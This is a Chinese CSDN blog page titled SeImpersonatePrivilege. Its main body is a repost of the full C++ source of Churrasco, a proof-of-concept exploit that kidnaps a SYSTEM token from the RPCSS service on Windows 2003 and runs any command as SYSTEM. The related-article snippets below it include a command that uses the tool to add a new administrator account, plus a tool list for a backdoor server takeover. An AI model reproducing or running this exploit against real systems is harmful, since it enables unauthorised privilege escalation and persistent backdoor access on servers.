SeImpersonatePrivilege

最新推荐文章于 2023-08-09 17:25:01 发布
最新推荐文章于 2023-08-09 17:25:01 发布
阅读量1.7k 收藏
点赞数
始于C#,精于C&C++,醉心于Windows内核与Com组件安全研究
本文链接:https://blog.csdn.net/oshuangyue12/article/details/78580329
版权 
//  Argeniss - Information Security - www.argeniss.com

//	**Churrasco**

//	Elevation of privileges PoC exploit for Token Kidnapping on Windows 2003
//  http://www.argeniss.com/research/TokenKidnapping.pdf

//  Author: Cesar Cerrudo

//	Needs impersonation and assign primary token rights in order to work, by default NETWORK SERVICE and LOCAL SERVICE accounts have these rights
//  Works fine in SQL Server running under any Windows account.
//	Works fine in IIS only when ASP .NET Application Pool is running under NETWORK SERVICE or LOCAL SERVICE accounts, it needs some minor modifications to 
//	work on an Application Pool running under a regular user account since this kind of account will be able to impersonate but wonn't have assign primary token right by default

// Netstat code taken from http://www.codeguru.com/forum/archive/index.php/t-188092.html by ashotog


#include "stdafx.h"


BOOL InvokeMSDTC(){
//IIRC this code was taken from MSDN
	ITransactionDispenser * pTransactionDispenser;
	ITransaction * pTransaction;
	HRESULT hr = S_OK ;
 
	// Obtain a transaction dispenser interface pointer from the DTC.
	DtcGetTransactionManagerEx(NULL,NULL,IID_ITransactionDispenser,0,0, (void **)&pTransactionDispenser);
	if (FAILED (hr)) {
		printf("/currasco/-->MSDTC service seems to have problems\n");
		return (0);
	}

	pTransactionDispenser->BeginTransaction( NULL,ISOLATIONLEVEL_ISOLATED, ISOFLAG_RETAIN_DONTCARE, NULL, &pTransaction ) ; 

	return 1;
}


typedef struct _MIB_TCPROW_EX
{
DWORD dwState; // MIB_TCP_STATE_*
DWORD dwLocalAddr;
DWORD dwLocalPort;
DWORD dwRemoteAddr;
DWORD dwRemotePort;
DWORD dwProcessId;
} MIB_TCPROW_EX, *PMIB_TCPROW_EX;

typedef struct _MIB_TCPTABLE_EX
{
DWORD dwNumEntries;
MIB_TCPROW_EX table[ANY_SIZE];
} MIB_TCPTABLE_EX, *PMIB_TCPTABLE_EX;

typedef struct _MIB_UDPROW_EX
{
DWORD dwLocalAddr;
DWORD dwLocalPort;
DWORD dwProcessId;
} MIB_UDPROW_EX, *PMIB_UDPROW_EX;

typedef struct _MIB_UDPTABLE_EX
{
DWORD dwNumEntries;
MIB_UDPROW_EX table[ANY_SIZE];
} MIB_UDPTABLE_EX, *PMIB_UDPTABLE_EX;


typedef DWORD (WINAPI *PROCALLOCATEANDGETTCPEXTABLEFROMSTACK)(PMIB_TCPTABLE_EX*,BOOL,HANDLE,DWORD,DWORD);
PROCALLOCATEANDGETTCPEXTABLEFROMSTACK lpfnAllocateAndGetTcpExTableFromStack = NULL;

BOOL LoadExIpHelperProcedures(void)
{
	HMODULE hModule;

	hModule = LoadLibrary(_T("iphlpapi.dll"));
	if (hModule == NULL)
		return FALSE;

	// XP and later
	lpfnAllocateAndGetTcpExTableFromStack = (PROCALLOCATEANDGETTCPEXTABLEFROMSTACK)GetProcAddress(hModule,"AllocateAndGetTcpExTableFromStack");
	if (lpfnAllocateAndGetTcpExTableFromStack == NULL)
		return FALSE;

	return TRUE;
}

BOOL IsImpersonationToken (HANDLE hToken, CHAR * cType)
{
	DWORD							ReturnLength;
	SECURITY_IMPERSONATION_LEVEL	TokenImpInfo;
	TOKEN_TYPE						TokenTypeInfo;

	if(GetTokenInformation(hToken, TokenType,  &TokenTypeInfo, sizeof(TokenTypeInfo), &ReturnLength)){
		if (TokenTypeInfo==TokenImpersonation) {
			if((GetTokenInformation(hToken, TokenImpersonationLevel,  &TokenImpInfo, sizeof(TokenImpInfo), &ReturnLength)&& TokenImpInfo==SecurityImpersonation)){
				if (cType) *cType='I';
				return TRUE;
			}
        }
		else { 
			if (cType) *cType='P'; //it's a primary token, TokenTypeInfo==TokenPrimary
			return TRUE; 
		}
	}

	return FALSE;
}

DWORD RunCommandAsSystem(HANDLE hToken, LPSTR lpCommand)
{
	HANDLE				hToken2,hTokenTmp;
	PROCESS_INFORMATION pInfo;
	STARTUPINFO         sInfo;
	DWORD				dwRes;
	CHAR				cType;
	LPTSTR				lpComspec;
	LPSTR				lpCommandTmp;


    ZeroMemory(&sInfo, sizeof(STARTUPINFO));
    ZeroMemory(&pInfo, sizeof(PROCESS_INFORMATION));
    sInfo.cb= sizeof(STARTUPINFO);
    sInfo.lpDesktop= "WinSta0\\Default"; 
 
	IsImpersonationToken(hToken, &cType);

	if (cType=='I'){
		SetThreadToken(NULL, hToken);
		OpenThreadToken(GetCurrentThread(),TOKEN_ALL_ACCESS,FALSE,&hTokenTmp);
		SetThreadToken(NULL, NULL);
	}
	else 
		hTokenTmp=hToken;

	DuplicateTokenEx(hTokenTmp,MAXIMUM_ALLOWED,NULL,SecurityImpersonation, TokenPrimary,&hToken2) ;

	lpComspec= (LPTSTR) malloc(1024*sizeof(TCHAR));
	GetEnvironmentVariable("comspec",lpComspec,1024);

	lpCommandTmp= (LPSTR) malloc(1024*sizeof(CHAR));

	strcpy(lpCommandTmp, "/c  ");
	strncat(lpCommandTmp, lpCommand, 500);
	
	dwRes=CreateProcessAsUser(hToken2, lpComspec, lpCommandTmp, NULL, NULL, TRUE, NULL, NULL, NULL, &sInfo, &pInfo);
	
	if (hTokenTmp!=hToken)
		CloseHandle(hTokenTmp);

	CloseHandle(hToken2);

	return dwRes;


}


DWORD GetRpcssPid(void)
{
	DWORD dwLastError, dwPort, dwSize, dwPid=0;
	PMIB_TCPTABLE_EX lpBuffer = NULL;
	PMIB_UDPTABLE_EX lpBuffer1 = NULL;

	if (!LoadExIpHelperProcedures())
		return 0;

	dwLastError = lpfnAllocateAndGetTcpExTableFromStack(&lpBuffer,TRUE,GetProcessHeap(),0,2);
	if (dwLastError == NO_ERROR)
	{
		for (dwSize = 0; dwSize < lpBuffer->dwNumEntries; dwSize++)
		{
			dwPort=((lpBuffer->table[dwSize].dwLocalPort & 0xFF00) >> 8) + ((lpBuffer->table[dwSize].dwLocalPort & 0x00FF) << 8);
			
			if (dwPort==135 && lpBuffer->table[dwSize].dwState == 2)
			{
				dwPid = lpBuffer->table[dwSize].dwProcessId ;
				break;
			}
		}
	}

	if (lpBuffer)
		HeapFree(GetProcessHeap(),0,lpBuffer);

	return dwPid;
}




BOOL GetTokenUser(HANDLE hToken, LPTSTR lpUserName)
{
	DWORD			dwBufferSize = 0;
	SID_NAME_USE	SidNameUse;
	TCHAR			DomainName[MAX_PATH];
	DWORD			dwUserNameSize= MAX_PATH * 2 ;
	DWORD			dwDomainNameSize = MAX_PATH * 2;
	PTOKEN_USER		pTokenUser;

	GetTokenInformation(hToken, TokenUser, NULL,0,&dwBufferSize);
	
	pTokenUser = (PTOKEN_USER) new BYTE[dwBufferSize];
	memset(pTokenUser, 0, dwBufferSize);

	if (GetTokenInformation(hToken, TokenUser, pTokenUser, dwBufferSize, &dwBufferSize)){
		if (LookupAccountSid(NULL,pTokenUser->User.Sid,lpUserName,&dwUserNameSize,DomainName,&dwDomainNameSize,&SidNameUse)){
			return TRUE;
		}
	}
	
	return FALSE;
}




HANDLE GetSystemToken(HANDLE hToken,DWORD Pid){
	HANDLE		hTgtHandle=0;
	TCHAR		UserName[MAX_PATH];
	HANDLE		hProcess;
	
	SetThreadToken(NULL,hToken);

	hProcess=OpenProcess(PROCESS_DUP_HANDLE,NULL,Pid);
	
	SetThreadToken(NULL,NULL);	

	if (hProcess) {	
		//Brute force token handles
		for (DWORD hSrcHandle=4;hSrcHandle<0xffff;hSrcHandle+=4){
			if(DuplicateHandle(hProcess,(HANDLE)hSrcHandle,GetCurrentProcess(),&hTgtHandle,0,FALSE,DUPLICATE_SAME_ACCESS ))	{	
				if (IsImpersonationToken(hTgtHandle, NULL)){
					if (GetTokenUser(hTgtHandle,UserName)){
						if (!strcmp(UserName,"SYSTEM")){
							printf ("/churrasco/-->Found SYSTEM token 0x%x\n",hTgtHandle);
							return hTgtHandle;
						}
						else
							printf ("/churrasco/-->Found %s Token\n", UserName);
					}
				}
				CloseHandle(hTgtHandle);
			}
		}
		CloseHandle(hProcess);
	}
	else {
		printf ("/churrasco/-->Couldn't open Rpcss process\n");
		return 0;
	}

	return 0;

}
//need to improve this!!!!
HANDLE GetNetServToken(){
	HANDLE		hToken;
	TCHAR		UserName[MAX_PATH];

	for (DWORD j=0x4;j<=0xffff;j+=4){
		hToken=(HANDLE)j;
		if (IsImpersonationToken(hToken, NULL) ){
			if(GetTokenUser(hToken, UserName)){
				if (!strcmp(UserName,"NETWORK SERVICE")){
					printf ("/churrasco/-->Found NETWORK SERVICE token 0x%x\n",hToken);
					return hToken;
				}
				else 
					printf ("/churrasco/-->Found %s Token\n",UserName);
			}
		}
	}
	return 0;
}


int _tmain(int argc, _TCHAR* argv[])
{
	DWORD	dwRpcssPid;
	TCHAR	UserName[MAX_PATH];
	DWORD	dwCharCount = MAX_PATH;
	LPSTR	lpCommand;
	HANDLE	hToken, hSysToken, hNetServToken=0;

	if (argc != 2) {
		printf ("/churrasco/-->Usage: Churrasco.exe \"command to run\"\n");
		return 0;
	}
	
	lpCommand= argv[1];
	
	if(GetUserName(UserName, &dwCharCount)){
		printf ("/churrasco/-->Current User: %s \n",UserName);
		if (strcmp(UserName,"NETWORK SERVICE")){
			printf ("/churrasco/-->Process is not running under NETWORK SERVICE account!\n");
			printf ("/churrasco/-->Getting NETWORK SERVICE token ...\n");
			
			//Call MSDTC to end up getting NETWORK SERVICE token in our process
			InvokeMSDTC();

			//Get NETWORK SERVICE impersonation token
			hNetServToken=GetNetServToken();
			if (hNetServToken==0){
				printf ("/churrasco/-->Couldn't find NETWORK SERVICE token\n");
				return 0;
			}
		}
	}
	else {
		printf ("/churrasco/-->Couldn't get current user name\n");
		return 0;

	}
	
	//Get RPCSS PID
	printf ("/churrasco/-->Getting Rpcss PID ...\n");
	dwRpcssPid=GetRpcssPid();
	
	//Set NETWORK SERVICE token as current thread token so we can open RPCSS threads
	SetThreadToken(NULL,hNetServToken);

	if (dwRpcssPid){
		printf ("/churrasco/-->Found Rpcss PID: %d \n",dwRpcssPid);

        //Brute force threads id, I'm lazy to use native APIs, this works the same
		printf ("/churrasco/-->Searching for Rpcss threads ...\n");
		for (DWORD Tid=0;Tid < 0xffff ;Tid+=4) {
			HANDLE hThread=OpenThread(THREAD_ALL_ACCESS,TRUE,Tid);
			
			if (hThread && dwRpcssPid==GetProcessIdOfThread(hThread)) { 
				printf ("/churrasco/-->Found Thread: %d \n",Tid);
				
				//Make thread impersonate Rpcss service account
				QueueUserAPC((PAPCFUNC)ImpersonateSelf,hThread,0x2 );

				Sleep(500);
				
				//If RPCSS thread is impersonating then we can get RPCSS process token
				if (OpenThreadToken(hThread,TOKEN_ALL_ACCESS,FALSE,&hToken)){
					printf ("/churrasco/-->Thread impersonating, got NETWORK SERVICE Token: 0x%x\n",hToken);
					printf ("/churrasco/-->Getting SYSTEM token from Rpcss Service...\n");
					
					//Get SYSTEM token from RPCSS service
					hSysToken=GetSystemToken(hToken,dwRpcssPid);
					if (hSysToken){
						printf ("/churrasco/-->Running command with SYSTEM Token...\n");
						if (RunCommandAsSystem(hSysToken, lpCommand)){
							printf ("/churrasco/-->Done, command should have ran as SYSTEM!\n");
							break;
						}
						else {
							printf ("/churrasco/-->Couldn't run command, try again!\n");
							return 0;
						}
					}
				}
				printf ("/churrasco/-->Thread not impersonating, looking for another thread...\n");
							
			}
			CloseHandle(hThread);
		}
	}
	else {
		printf ("/churrasco/-->Couldn't find Rpcss PID!\n");
	}
	return 0;
}

王cb
关注
SeImpersonatePrivilege权限提权(Server 2019)
墨痕诉清风的博客
04-23 1151
SeImpersonatePrivilege权限提权
hackthebox - Tally (考点:sharepoint & ftp & keepass & smb & sqsh & SeImpersonatePrivilege
冬萍子癸水
05-12 1309
1 扫描 21想到ftp进去找文件,139 445想到smb进去找文件,但都进不去。80进web搜集信息。看到是sharepoint页面。或者在nmap扫描也可看到32844端口开着。这也是sharepoint的一个默认端口 2 sharepoint枚举 sharepoint的文件太多,枚举也是个很麻烦的事。。 可以用这个sharepoint枚举工具 C:\root\exp\SharePointURLBrute v1.1 - 18MAR2012> perl SharePointURLBrute\
Windows 权限提升:SeImpersonatePrivilege
最新发布
xnxqwzy的博客
08-09 192
谈到SeImpersonatePrivilege(身份验证后模拟客户端),它是在Windows 2000 SP4中引入的。被分配此权限的用户是设备本地管理员组的成员和设备的本地服务帐户。除了这些用户和组之外,以下组件也具有此用户权限: 由服务控制管理器组件对象模型(COM) 服务器启动的服务由 COM 基础结构启动并配置为在特定帐户下运行现在我们知道哪些类型的用户拥有此特权,是时候了解用户使用这些特权获得什么了。每当为用户分配 SeImpersontatePrivilege
JuicyPotato提权
b10d9的博客
01-27 3663
需要了解的几个知识点 BITS服务是什么 BITS是一个与网络传输相关的系统服务。可用于上传下载文件到HTTP或SMB服务器,Windows更新也用到了BITS,BITS可以实现网络重连或系统重启后,续传文件。 BITS是与.NET/C/C++开发相关的COM接口。BITS是一种COM服务。 BITS会监听本地6666端口。 RottenPotatoNG是什么 基于BITS服务进行提权工具。 当具备SeImpersonate和SeAssignPrimaryToken权限时,禁用BITS服务,并占用
权限提升之利用相关服务提权(烂土豆系列).pdf
10-21
首先,需要了解的前提是拥有SeImpersonatePrivilege或SeAssignPrimaryTokenPrivilege权限。拥有这些权限的用户可以使用Potato提权来获取SYSTEM权限。具体来说,本地管理员账户和服务账户都可以使用这种方法来获取...
PrintSpoofer:滥用Windows 10和Server 2019上的模拟特权
systemino的博客
06-01 2482
概述 在过去的几年中,类似于RottenPotato、RottenPotatoNG或Juicy Potato这样的一些Windows特权模拟工具,已经在攻防安全社区中非常流行。但是,随着操作系统不断的升级,其中也有意或无意地降低了在Windows 10和Windows Service 2016/2019上使用这些工具的效果。而我们本次分析的是一个全新的工具,将有助于渗透测试人员再次轻松地利用这些特权。 需要请大家注意的是,在这里我们介绍的是一种新的工具,而不是新的技术。实际上,我将配合该工具,讨论两种可
MS Windows SeImpersonatePrivilege权限提升漏洞
weixin_33938733的博客
07-16 1085
受影响系统:Microsoft Windows XP SP2Microsoft Windows Vista SP1Microsoft Windows Vista Microsoft Windows Server 2008Microsoft Windows Server 2003 SP2Microsoft Windows Server 2003 SP1描述:Windows是微软发布的非常流行的操作系...
此计算机必须为委派而被信任_WCF 的委派和模拟
weixin_42508215的博客
12-24 382
WCF 的委派和模拟Delegation and Impersonation with WCF03/30/2017本文内容模拟 是一种常用技术,服务可使用该技术限制客户端对服务域资源的访问。Impersonation is a common technique that services use to restrict client access to a service domain's res...
linux权限数字‘755’,‘700’等代表的含义
WILDCHAP_的博客
09-28 7033
444 r–r--r– 600 rw------- 644 rw-r–r-- 666 rw-rw-rw- 700 rwx------ 744 rwxr–r-- 755 rwxr-xr-x 777 rwxrwxrwx 从左至右, 1-3位数字代表文件所有者的权限, 4-6位数字代表同组用户的权限, 7-9数字代表其他用户的权限。 读取权限:等于4 用 r 表示 写入权限:等于2 用 w 表示 执行权限:等于1 用 x 表示 例如: 755 7: 4+2+1 rwx 所有者具有读取、写入、执行.
go开发报 A required privilege is not held by the client 错误
zy332719794的专栏
04-06 3949
这种问题一般是go的程序包括第三方包程序对文件访问的权限不足引起。 这是打开操作系统开发者模式即可。且在真实运行环境如Linux上是不会有问题的。 打开操作系统开发者模式方法: 操作系统 -> win -> 设置-> 开发者选项 -> 开启“开发人员模式” ...
SHIFT后门拿服务器之方法总结
weixin_34006965的博客
03-11 250
提权工具如下:cmd.exe Churrasco.exe nc.exe 提权前提:Wscript组件成功开启 如果Wscript组件被关闭,则使用以下方法开启: 源代码: &lt;object runat=server id=oScriptlhn scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"&gt;&lt;/...
Windows普通程序与服务程序的初始特权(Privileges)
Joal_zhu的专栏
04-26 6022
最近在学习写Windows服务程序,发现Windows普通程序与服务程序的初始特权很不一样,很想记录下来: 特权 交互服务 (System帐号) 非交互服务 (System帐号) 服务 (Administrator) 普通程序 (Administrator) SeAssignPrimaryTokenPrivilege Disnabled Disn
关于进程权限设置
seawt的专栏
08-03 8479
<br />SE_ASSIGNPRIMARYTOKEN_NAME = "SeAssignPrimaryTokenPrivilege"<br /> 替换进程级记号,允许初始化一个进程,以取代与已启动的子进程相关的默认令牌.<br />SE_AUDIT_NAME = "SeAuditPrivilege"<br /> 产生安全审核,允许将条目添加到安全日志.<br />SE_BACKUP_NAME = "SeBackupPrivilege"<br /> 备份文件和目录,不多说了,就是翻阅遍历,执行文件,读取
pr.exe、Churrasco.exe、ms10048.exe用法及提权原理
热门推荐
ropin_os的专栏
09-17 2万+
1.Churrasco.exe是Windows2003系统下的一个本地提权漏洞,通过此工具可以以SYSTEM权限执行命令,从而可以达到添加用户的目的。 使用方法: Churrasco.exe "net user admin1 admin1 /add && net localgroup administrators admin1 /add" 补丁名:kb952004
判断程序是否是以 管理员 身份运行 visual c++
Black Shadow
10-22 3331
// 判断本程序是否是以管理员身份运行的 //BY :暗影行者 // date: 20110716 BOOL ExeIsAdmin() { #define ACCESS_READ 1 #define ACCESS_WRITE 2 // if(g_bIsNT==FALSE) return TRUE; HANDLE hToken; DWORD dwStatus; DW
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值